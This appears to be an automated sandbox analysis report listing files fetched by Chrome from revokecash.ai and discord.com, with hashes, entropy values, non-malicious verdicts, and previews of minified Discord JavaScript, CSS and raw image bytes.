                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["49578"],{696675:function(e,s,t){"use strict";t.r(s),t.d(s,{MicrophoneIcon:function(){return r}});var a=t("37983");t("884691");var l=t("669491"),n=t("75196");let r=e=>{let{width:s=24,height:t=24,color:r=l.default.colors.INTERACTIVE_NORMAL,colorClass:i="",...c}=e;return(0,a.jsxs)("svg",{...(0,n.default)(c),xmlns:"http://www.w3.org/2000/svg",width:s,height:t,fill:"none",viewBox:"0 0 24 24",children:[(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,d:"M12 2a4 4 0 0 0-4 4v4a4 4 0 0 0 8 0V6a4 4 0 0 0-4-4Z",className:i}),(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,d:"M6 10a1 1 0 0 0-2 0 8 8 0 0 0 7 7.94V20H9a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-2v-2.06A8 8 0 0 0 20 10a1 1 0 1 0-2 0 6 6 0 0 1-12 0Z",className:i})]})}},126489:function(e,s,t){"use strict";t.r(s),t.d(s,{StickerSmallIcon:function(){return r}});var a=t("37983");t("884691");var l=t("669491"),n=t("75196");let r=e=>{let{width:s=24,height:t=24,color:r=l.default.co
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):148
                                                                          Entropy (8bit):4.743441159286795
                                                                          Encrypted:false
                                                                          SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KJoYANtK6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqvNtK34A
                                                                          MD5:BB37F7F93FAEDAE4ECEC9D37813F6EB7
                                                                          SHA1:E65D7485EF117D4EA0B9045BBB17AB590967DA21
                                                                          SHA-256:D2947E474937485C8587845FE404BBB97D4D563579E03F2C840A059723D801B4
                                                                          SHA-512:2403784D508D881DAD820837B90DBF85DFE898A48E0BB925066B1E4B8AE5CFC288DE9E05B59BEAFCAF8A922A4C0A3C002A23673DF7FACF71DFC972035FF08B50
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/learn/faq
                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /learn/faq</pre>.</body>.</html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (16812)
                                                                          Category:downloaded
                                                                          Size (bytes):16867
                                                                          Entropy (8bit):5.506541301109812
                                                                          Encrypted:false
                                                                          SSDEEP:192:Ldb+ONJGEKwh5JiZFNI9H2ipr7fabonuJ67026wwBY0ocMAYRalFe2L71YYP9Ycs:R/JGs/JGFNGprhu1nBlopAD7vlnkYU7R
                                                                          MD5:2DEDF20CBA263865A1BCFCF3123F94B2
                                                                          SHA1:4FC7CE834DB5E148CC98CD681C9748984F6C3613
                                                                          SHA-256:6A7FD248CD879BBDE142C236FCC943F1F1E1CA2B089A4E89B9B0DD9359881AEA
                                                                          SHA-512:2EF98EB476BF16BD2D44E9C0AE137678DA30BD2B2F29536360E6E3931442331F8D700F7C5B46DD143A8ABEB4A74ACFEBF25030E44355FDB6741C3E594FFAF684
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/37580.640f5dece69c9284b1ba.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["37580"],{260365:function(t,e,i){"use strict";i.r(e),i.d(e,{default:function(){return s}});var a=i("872717"),n=i("913144"),l=i("716241"),d=i("884351"),r=i("42203"),u=i("450911"),c=i("819689"),o=i("49111"),s={updateActivity(t){let{applicationId:e,distributor:i,shareActivity:l,token:d=null,duration:r=0,closed:u=!1}=t;n.default.wait(()=>n.default.dispatch({type:"ACTIVITY_UPDATE_START",applicationId:e,duration:r,distributor:i})),a.default.post({url:o.Endpoints.ACTIVITIES,body:{application_id:e,token:d,duration:r,share_activity:l,distributor:i,closed:u},retries:1,oldFormErrors:!0}).then(t=>{let{body:{token:a}}=t;n.default.dispatch({type:"ACTIVITY_UPDATE_SUCCESS",applicationId:e,token:a,duration:r,distributor:i})}).catch(()=>{n.default.dispatch({type:"ACTIVITY_UPDATE_FAIL",applicationId:e})})},sendActivityInvite(t){let{channelId:e,type:i,activity:a,content:n,location:u}=t,s=r.default.getChannel(e);if(null==s)return Promis
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1280x720, components 3
                                                                          Category:dropped
                                                                          Size (bytes):100997
                                                                          Entropy (8bit):7.939423623665648
                                                                          Encrypted:false
                                                                          SSDEEP:1536:GF4NMbBlLa8TGIno8GcihF5w7GzyPDMQUysrSCzbfA8KNgy:GF4SllPTGIno8GZ5qGosSC31C
                                                                          MD5:E691554E1F1D4C64A4BE3F445613C9AD
                                                                          SHA1:112137B7CB62892F8164D9CB33559931663F612F
                                                                          SHA-256:A8C0D3759DF82693528A00833637918D56803992C7948391AEE5BA1EDF65E467
                                                                          SHA-512:85FC87BC81ADCB810A22628C5239910B10C18F810BD936CEB40841D041BC795E7AB58C066641AEEFBB63A219852A397327EFF90935B34F8ED9E3E03754B75661
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF.....H.H..................................................................................................................................................."....................................................ffRL...$.12HL...L.).)&bRL.....*$..D.$.).....RL.O].V..1)..&b.)LL..%ZEBS"e$.JR.35$.JS..%)%)J...D.$..I...R.*.JR.R..J@..RL."B.."S$...2L...".I$.R..&ffBe=s33$."fHT..R..&*..R...L.H..L.D...).$..e)...T.$.O]T.)J..Ja)..&BIL.$..)LJf*....R..H.RT..$..J.Us*.U!Rz.2&T.....A!"@$. .)...H.....P..D.2U$R.....L......??...|...b................*..d..%.v=.._./.?a.......]..e..G3..v...-..../..L.../X............7...55U\..Ji).E...%.-...m<Ne.}..'g...r/..-g..p{~.............9...5WT..J ...d....-. ............L.H....k.'..LB#.9.c\..'.:....t.#1...&.X...........lWu...g.Zu.....otN..M...L.+.s._..:.X.........4U.Gf.....m.F..=-..o]C...u..................w.?.}...n.....~...h~.~J...z+..c.>....W^..2...^...U.j.z.Q.4.=.H.bm............2.....=....x..v...u+u.S..........................z...]c...&).~..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text
                                                                          Category:downloaded
                                                                          Size (bytes):19493
                                                                          Entropy (8bit):5.036315347992405
                                                                          Encrypted:false
                                                                          SSDEEP:192:f6QR6QtoJ0MnRm7+AHUs8b+cRVI6l5Hl+QlQ1ZrfX8:f1R1Gm7+AHUs8b+ORlQ1Zrk
                                                                          MD5:5626B4F1F4FB99E8A0DF0B00FFFDC591
                                                                          SHA1:AE10EE75B2ABA82AAD1B9F163B6CCA1EB4D8A01A
                                                                          SHA-256:8C22A5AB42C973DBC79DA04448394B72EEAD6C2194509F34917F61955CF132D0
                                                                          SHA-512:E92E22430004ED7B0DDFBA2E35BCE875F15C9F69F09DE147126EDCAF23007E8597723CA70FC2F558952F20766CB888B3022B982462750E66E4ACEEF93133D131
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_css/styles.css
                                                                          Preview:.css-b62m3t-container {..position: relative;..box-sizing: border-box;...}...css-7pg0cj-a11yText {..z-index: 9999;..border: 0px;..clip: rect(1px, 1px, 1px, 1px);..height: 1px;..width: 1px;..position: absolute;..overflow: hidden;..padding: 0px;..white-space: nowrap;...}...css-10p3679-control {..-webkit-box-align: center;..align-items: center;..cursor: pointer;..display: flex;..flex-wrap: wrap;..-webkit-box-pack: justify;..justify-content: space-between;..min-height: 0px;..position: relative;..transition: all 100ms ease 0s;..background-color: black;..border-color: white;..border-radius: 8px;..border-style: solid;..border-width: 1px;..box-sizing: border-box;..color: white;..outline: 0px !important;...}...css-10p3679-control:hover {..background-color: rgb(39, 39, 42);...}...css-15pp9oa {..-webkit-box-align: center;..align-items: center;..display: grid;..flex: 1 1 0%;..flex-wrap: wrap;..position: relative;..overflow: hidden;..padding: 0px;..box-sizing: border-box;..margin: 0px;...}...css-1re
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):8692
                                                                          Entropy (8bit):7.918801905451458
                                                                          Encrypted:false
                                                                          SSDEEP:192:vL0+aEg35IFbYAjo4JNVzf5n7YyFTaYl+Y1O6Hz3w0hQ3+9BCwpIuahTBt:yIFEAjXJfLCyFTau+J6H3T9BCwsf
                                                                          MD5:759E449A781EF4E4D5D42EE111F04C94
                                                                          SHA1:5A84BB19C7A4B4D117B1DB145A40639BD8A536B1
                                                                          SHA-256:E45A166627C8634E983157B6EBB7BA7DE633DFD636ED306BFBC3B3EF7429DF36
                                                                          SHA-512:6318ED2803C7C55C9D95783B00A06A2BA5D0276A9D840CB76DF6B201AEBC9C1385F1DB5EC04834EAA529F614262267A6F1F29540A7A58B5162009881C7A04444
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a.....wPLTEGpL.E.G.G.H.H.G.F.F.G.F.G.G.G.G.G.G.F.F.G.G.F.F.F.G.G.F.G.G.G.G.G.F.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.F.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.F.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.G.F.G.G.uK.G.G.G..a.l-.G.G.G..W....ztRNS....... ..).........#.......[.....'%..`..D.i.Q..V.:..K../...NX.b.g..-5......nq.F+....1.A.~.?..3HS..M..^l.z.d7<...tw...|.p....IDATx..i[.M...(...eW.dS..A@..AQ.EEP.DE\P\.....@ .t....Lf......I.T.>U.......`0..zX.H......Z....J..e!M..5.67].q.,.V..>.Ze...s..B.F.......\".0A.....C..V.l.B.....Bv6#OPl.2G{..D~......'(.dZ..N..+.\........f...&.f5,..l,.....z._..O.[,.r.YF.]q...5x#n9.i.....\s.\.....f{...p......r+...U.L.I..Hdd..r.I.6......(.n...H.re&h.h.'?A.z..r%..L..(.....s....3A.>....(..9\..Q.\.l.ms.%{.b..5:,].dZvyX'}.B.9Yn.b......L|R<@...#.r%.._|&.X..E
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (62630)
                                                                          Category:downloaded
                                                                          Size (bytes):62685
                                                                          Entropy (8bit):5.3152897595782465
                                                                          Encrypted:false
                                                                          SSDEEP:1536:MF04ZWu0ig19imTpqdSMg19qvgM1sf9U1:01g19imTpqdSMg19qvgMsu
                                                                          MD5:C6070A74FC7828610536A88F4EF0AC00
                                                                          SHA1:58FF20E6B81343CE9FB04C9A3B98E96EEACED06B
                                                                          SHA-256:5A52FADD5EFD62ECEE80F803D600055810FB7765497D80E95E8F61AA27286CC5
                                                                          SHA-512:FD3376F7776DD81220620BA375441D26981847BFE1719DD8A7A3F7CEFA1CA2FFE5042DF4FEF1810D8752D7E58BE6F022CF3A9A0BD0A060022821A97C05F44C8A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/18407.d0257553d76c1da19de7.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18407"],{444791:function(e,l,t){"use strict";t.r(l),t.d(l,{AnnouncementsIcon:function(){return r}});var a=t("37983");t("884691");var n=t("669491"),s=t("75196");let r=e=>{let{width:l=24,height:t=24,color:r=n.default.colors.INTERACTIVE_NORMAL,colorClass:i="",...c}=e;return(0,a.jsxs)("svg",{...(0,s.default)(c),xmlns:"http://www.w3.org/2000/svg",width:l,height:t,fill:"none",viewBox:"0 0 24 24",children:[(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,fillRule:"evenodd",d:"M19.56 2a3 3 0 0 0-2.46 1.28 3.85 3.85 0 0 1-1.86 1.42l-8.9 3.18a.5.5 0 0 0-.34.47v10.09a3 3 0 0 0 2.27 2.9l.62.16c1.57.4 3.15-.56 3.55-2.12a.92.92 0 0 1 1.23-.63l2.36.94c.42.27.79.62 1.07 1.03A3 3 0 0 0 19.56 22h.94c.83 0 1.5-.67 1.5-1.5v-17c0-.83-.67-1.5-1.5-1.5h-.94Zm-8.53 15.8L8 16.7v1.73a1 1 0 0 0 .76.97l.62.15c.5.13 1-.17 1.12-.67.1-.41.29-.78.53-1.1Z",clipRule:"evenodd",className:i}),(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,d:"M2 10c
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65474), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):1809096
                                                                          Entropy (8bit):5.638450935996059
                                                                          Encrypted:false
                                                                          SSDEEP:24576:70kdq1admgHEzi34BM7ld6xrVDklL9k3PF:sA4gHEO34Bkd6xrVDq9IF
                                                                          MD5:BDE3D290AA908D2161150C720C8BC1FD
                                                                          SHA1:EFF994425455AE969B22CD789013D378C022336A
                                                                          SHA-256:72AD14EC76AB36D8607618E514A56447A9326E1B764094DA0856E6E6DEDE9A7C
                                                                          SHA-512:B34DD3B330CEC0C03E94F856CD62A8B5CDC8CA70E62AC5852CC73B796A12E43B0B6FF5E635D98A25A1242D61DCE621FA7CF08D40F0D9367E594568085F26C466
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/66318.3e13ea80eda74e3ed337.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["66318"],{229353:function(e,_,E){e.exports=Object.freeze({DISCORD:"Discord",DISCORD_DESC_SHORT:"Imagine a place",DISCORD_DESC_LONG:"Join over 100 million people who use Discord to talk and hang out with communities and friends.",NOTIFICATION_BODY_ATTACHMENT:"Uploaded !!{filename}!!",NOTIFICATION_TITLE_START_GAME:"Somebody Playin'",NOTIFICATION_BODY_START_GAME:"!!{username}!! started playing !!{gameName}!!!",NOTIFICATION_MESSAGE_CREATE_GUILD_ACTIVITY_JOIN:"!!{user}!! invited the channel to play !!{game}!!",NOTIFICATION_MESSAGE_CREATE_GROUP_DM_ACTIVITY_JOIN:"!!{user}!! invited the group to play !!{game}!!",NOTIFICATION_MESSAGE_CREATE_DM_ACTIVITY_JOIN:"!!{user}!! invited you to play !!{game}!!",NOTIFICATION_MESSAGE_CREATE_DM_ACTIVITY_JOIN_REQUEST:"!!{user}!! has requested an invite to !!{game}!!",NOTIFICATION_MESSAGE_CREATE_GUILD_ACTIVITY_LISTEN:"!!{user}!! invited the channel to listen on Spotify",NOTIFICATION_MESSAGE
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (60461)
                                                                          Category:downloaded
                                                                          Size (bytes):60516
                                                                          Entropy (8bit):5.596363190909485
                                                                          Encrypted:false
                                                                          SSDEEP:1536:QVXD0OzbWHRxfT4AO+75ddl4QB0o/EM9WN4Ljf0TDAqgJPlTrKvPjBXqI7eCEtZL:mJMm3zzJW
                                                                          MD5:B4A4F95BDDA2964192FDF7FFC0D70434
                                                                          SHA1:2B0ED3DBE3F8FEE443DF96AE8C0FAB50C3C913F2
                                                                          SHA-256:460EE5F9437D4B385DA56AA0A49E35C899B6AF9F6A6480D5DB5659F3A30DBD40
                                                                          SHA-512:B067CAFD21459EC8420B30A754EE54E879EC17CADAF6EAB777E2BE964093D09A317A83B3083568DFF35593C449EAD9039D2E91B3DCC14B2EC3BFE6F03743B9FF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/59310.e3191416559a74901ac0.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["59310"],{316718:function(t,e,n){"use strict";n.r(e),n.d(e,{fetchUserEntitlementsForApplication:function(){return a},fetchUserEntitlements:function(){return o},fetchGiftableEntitlements:function(){return s}});var u=n("872717"),i=n("913144"),r=n("271560"),l=n("49111");function a(t){let e=!(arguments.length>1)||void 0===arguments[1]||arguments[1];return i.default.wait(()=>{i.default.dispatch({type:"ENTITLEMENT_FETCH_APPLICATION_START",applicationId:t})}),u.default.get({url:l.Endpoints.ENTITLEMENTS_FOR_APPLICATION(t),oldFormErrors:!0,query:{exclude_consumed:e}}).then(e=>(i.default.dispatch({type:"ENTITLEMENT_FETCH_APPLICATION_SUCCESS",applicationId:t,entitlements:e.body}),e.body)).catch(()=>{i.default.dispatch({type:"ENTITLEMENT_FETCH_APPLICATION_FAIL",applicationId:t})})}async function o(t){let{withSku:e=!1,withApplication:n=!1,entitlementType:r}=t;i.default.dispatch({type:"ENTITLEMENTS_FETCH_FOR_USER_START"});try{let
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13519)
                                                                          Category:downloaded
                                                                          Size (bytes):13574
                                                                          Entropy (8bit):5.588728061626365
                                                                          Encrypted:false
                                                                          SSDEEP:192:dtvlCylrDTMfqEJyx3RBEo8y9x0BXjTq9O5KnRCL4:dTBgfqjASx0Bq5R9
                                                                          MD5:0408BECAE75262CA3CB845FF4957F7C4
                                                                          SHA1:6F62BC58F6D92C2184C32A9E6E1FD10333FA79D9
                                                                          SHA-256:ADF238A5F94722BD2E9B4DA5A95E9BEFD1882D0ACF0CB89F4BE3D1D73D239CBF
                                                                          SHA-512:2A836413BAD6E97DF5FA4DCB1BB49AD09606A9DAF4615B57E6E2D17C0976CB7FA98A446C06181F1296C1DFF5BE0F22D6AD7AD747B8AB5543698D82062C1FE52C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/89894.44f49c0018afb3694fe7.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["89894"],{79112:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return _}});var l=n("872717"),o=n("95410"),i=n("913144"),u=n("211895"),r=n("26092"),s=n("599110"),a=n("315102"),d=n("730622"),c=n("49111"),S=n("191349"),E=n("782340"),_={open(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null,t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{openWithoutBackstack:!1};(0,u.default)(e,t,n)},init:function(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=arguments.length>2?arguments[2]:void 0;i.default.dispatch({type:"USER_SETTINGS_MODAL_INIT",section:e,subsection:t,...n})},close(){let e=r.default.onClose;i.default.dispatch({type:"USER_SETTINGS_MODAL_CLOSE"}),null!=e&&e()},setSection(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=arguments.length>2&&void 0!==arguments[2]?arguments
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15188)
                                                                          Category:downloaded
                                                                          Size (bytes):15243
                                                                          Entropy (8bit):5.673058862636293
                                                                          Encrypted:false
                                                                          SSDEEP:384:7lnBPK53+jEksl5wbXg7LlkUgVzuqGLn6H:7lnBK53+ml5wbElk9zuqF
                                                                          MD5:0B486DB352A52CCFBB428F9AB615C434
                                                                          SHA1:B3D6B7DA10459F27AC4545E3020D27A07C8DD956
                                                                          SHA-256:3C1FDF9BA1928DC533B163D74CF353DAE2A30E64C7628431C831E3A72306A69A
                                                                          SHA-512:3EDF29CAECA8FED76FA91DA44BDD6D0273D84F8FC3BABF99CFC553FCAD8A9AB09230A232D585582E3A872278DA4B10090C7DB24899B997B63F5090552D2EC60C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/43870.40da167473dc0e9edab1.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43870"],{53708:function(t,e,r){"use strict";t.exports=r.p+"f6c7b8245d3a54cf98b2.png"},688318:function(t,e,r){"use strict";r.r(e),r.d(e,{default:function(){return T}}),r("222007");var n=r("884691"),o=r("446674"),u=r("206230"),i=r("91653"),l=r("697218"),a=r("471671"),s=r("315102"),c=r("53708"),T=t=>{let{user:e,size:r,animateOnHover:T=!1,showPending:E=!1,showTryItOut:d=!1,avatarDecorationOverride:_}=t,[S,C]=n.useState(!1),I=(0,o.useStateFromStores)([u.default],()=>u.default.useReducedMotion),A=(0,o.useStateFromStores)([a.default],()=>a.default.isFocused()),f=(0,o.useStateFromStores)([l.default],()=>{var t;return null===(t=l.default.getCurrentUser())||void 0===t?void 0:t.id}),v=(0,o.useStateFromStores)([l.default],()=>{var t;return null===(t=l.default.getUser(null==e?void 0:e.id))||void 0===t?void 0:t.avatarDecoration}),{pendingAvatarDecoration:O}=(0,i.default)({isTryItOut:d}),N=A&&(S||!I&&!T),R=E&&void 0!==O&&void 0!=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):137
                                                                          Entropy (8bit):4.7861988241054
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                          MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                          SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                          SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                          SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/1af9bdf041e000508e41.svg
                                                                          Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):10062
                                                                          Entropy (8bit):7.942447012377408
                                                                          Encrypted:false
                                                                          SSDEEP:192:xlSa96VdLyAetTmNXwldmdt+ov1zriFAjkjJm9DQYx5UR9nHzDlZ5o/SEEL:z8VdujtTGWLoVr6AQJmhP5ktHlZ5oaEK
                                                                          MD5:2F4519D141B419D2EA2D84733E239DF9
                                                                          SHA1:949A1C6374C29393D8DAA38D8E088B17FE424C34
                                                                          SHA-256:FA08EB032FB36D99C00997010B2824413B29D48F5BE1CA99818AC044A11B38A0
                                                                          SHA-512:7E776900AB54C88DF3D431341820621C4D96D8B574B638810F99CB3C60D2C8F6406851A936DE8E3A30C5F479BC792D95BC72A41A5DD27408518556752B82B707
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a.....mPLTE../bh....EJu...ci....dj......-`f.DItkr....`e......0ag...,..-..+..,...CHsLQ{[a..!5ci.. 4...ek.FKv..2fl...)dj...*..1.&<bh..#7.$8!(>.....(."6..._e.*1H...... '<..2..+&-C^d....GLw[a.#*@ek.`f..%:17O\b.U[.]c.HMxgn.28SV\.(.E...-4K...%,A)0G...5<WPVx|..EJv...&-H$*C.5OZ`.SY|FLlIOp.........FKw<C`;CZMSuQX{#+?CKc...x..z..`f.JQr4:URZsW].?Fd8>ZAGf......^f.AGpNTvX^.,2Kmt....JQj8=b>Db...?F^MS}Y_.w~.W_yRX.pw.?Em+2I3:R..%7>UOWpah.4;RTZ.)0M07XPU.ah.BIgCJiTZ}......Ya|T\vLTmpx.AH`Y_....EKjKRscj./6Lry.\c~9@W=Cj!(A..0GNnu}.t|.~..nv.ci.JOykr.el.]c.~..ag.sz.v}.hp.HPhFMfy...#9;@f-3N:A]lt.5=Sip.39\7=Yfn.|..;B_9@\mu.-3S5;_dk....]d.DJtz..ej.bg...^...$.IDATx..._.g.g.{vv.$....lg...{.^.H...*. ......%b.5.K...F.FM..7..Y..2[Y .;.../.?...9g.a.........................................................................@....!..?.`.I5a...it.j.....^%...*..^...0L..5>....s.A.,4.....vD.l^Z..\...?..A.X...;,... .h..6a"....*L........k.....1. d.A..|.J..>...k....&. Je..)..Ap.g.....?...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13367)
                                                                          Category:downloaded
                                                                          Size (bytes):13422
                                                                          Entropy (8bit):5.59756931187037
                                                                          Encrypted:false
                                                                          SSDEEP:384:JhihY0XSX1lS36UjCaRjgTRK/n26HhRBUyL8SAzO7il+/qy2p3h1fnsqcjG+TD7K:JYW0XS0lxlPR6yxer
                                                                          MD5:965C60E9ADE918F62E984CA7032C986F
                                                                          SHA1:B26E678DE5B97CBC6638BB91B30D5A32DE0AD7AF
                                                                          SHA-256:00F12DBE8458DC10F59B3A12E892E609456816DC81CA84CEC65CA6D40BB465AA
                                                                          SHA-512:B2EFCF6A48D658C77A1EBA1F3AEA7E52C8AE6B2BEE819BDBFDF6C8A725693E71F8265A9D4FC491DADA450C81503F90962AE3AC455D89F7DCC25DEB66092F5403
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/99618.2a643a274b3a91f762ae.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["99618"],{719451:function(e,t,l){"use strict";l.r(t),l.d(t,{InviteResolvingHeader:function(){return g},default:function(){return v}}),l("70102");var n=l("37983"),s=l("884691"),a=l("446674"),u=l("77078"),r=l("770032"),i=l("653047"),o=l("233069"),c=l("813006"),d=l("766274"),f=l("697218"),E=l("953109"),_=l("580357"),I=l("124969"),h=l("587974"),T=l("158998"),N=l("49111"),C=l("238055"),p=l("91366"),A=l("782340"),m=l("310042");let g=()=>(0,n.jsxs)(s.Fragment,{children:[(0,n.jsx)(I.Avatar,{src:null,size:u.AvatarSizes.DEPRECATED_SIZE_100,className:m.avatar}),(0,n.jsx)(I.SubTitle,{children:A.default.Messages.INSTANT_INVITE_YOU_HAVE_BEEN_INVITED_TO_JOIN}),(0,n.jsx)(I.Title,{className:m.inviteResolvingGuildName,children:A.default.Messages.LOADING})]}),S=e=>{let{guild:t,user:l,application:s,compact:a}=e;if(null!=s)return(0,n.jsx)(E.default,{className:m.appIcon,game:s,size:m.appIconSize});if(null!=l)return(0,n.jsx)(I.Avatar,{src
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):2128
                                                                          Entropy (8bit):7.834307897587494
                                                                          Encrypted:false
                                                                          SSDEEP:48:awrulyJN5YwGa0bktFsz/62RWnAPGNhZQGIcEOhO0URVW+b:7Yy359reS2kZhjbxsb
                                                                          MD5:655640D0240EDA849DFA66F653E739B7
                                                                          SHA1:1FFD89E2CCC04AD2BED9B4A1F1FD452A07ABD4DA
                                                                          SHA-256:E790EB301823DC91B8A64BFDBDB1ABCDD9004D6CF569CA417D68A2769683F08E
                                                                          SHA-512:8FD8A83DC46F9DEF90D51903530B36C767727D1D78C39EEEAE8DBB5880B9CE821BCFD439B073EA5FA7805C69B2FACF53C1C2E61E36924C6F4D97D9473B324566
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE.@.?.?.<.?.?.@.9.9..?.?.:.>.?.5.~8n...~>O....g...XNeN\g....<.i5.9 L.....c_ny'M./.W..c.....g{.h....jmsI..b..\...w8.dC.@..q6.eF..."<.<.z..@KWoqs...Q<AEM'..v]..w~D.<.....U..T.1n.<.o5...^^T^avRbn...FR]/E.[q....Rgw01)......y.QP?.C....]......# ..x2_kb~hUq{v.:O#=6IWbt...u./...........OZ_8..lGf^6^mNG...wQz..yj.P...5L%K3....l...70?...TR0Z..k.....;.....mm....ou._H...T.w..`/.gS24...{.Q{.t..hpO*.S.IGV..&D)+_1...nakM]..4.``Ro..thbaiq?z..M\-...]1.E...m....xx{\GR$..q8g.S...h7D7.=..........|B.w?Y. j.".G).s@.X-n`.Kq#.Y<..Y.E .wSH).tW.ROv9$/y....w.!....yi.zLV.QD:HH!$.~.....$uqQ.UF.eP.__gx.......B....L.Q...jqwc...\\.sQ.M]W.J.Ms.f..e"V2.UX.:u.TMI...Zf.a.<...>...c,..D......X ...g>#.{.3M......sI.....M.tn.........z{n.45......|...m.L....:.N...P.<....tRNS.......e........pHYs.................IDATx...uT[K......H.8...)......wwwh.5....Z(uwww}......hI.....{.wwfg...MC .S...4...Lu=......c=...M9.Q.../......@ ..IuJ..x......I`*. .b...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):1126
                                                                          Entropy (8bit):7.725459253081851
                                                                          Encrypted:false
                                                                          SSDEEP:24:omLPBsB/6kEb/QJzX+2A25PSjYBBukM7Z+lLN:7CB/6zQdJOjmBW7gLN
                                                                          MD5:D48754B77C5D1543AE9DE2FC0E49B2EF
                                                                          SHA1:D4E136DD147E6CECFBE58BE2E9AD0144CC747784
                                                                          SHA-256:EE420A3AA4EC8EACC9A76E87867480920D9DC882ABC3B9F231492561FEC35760
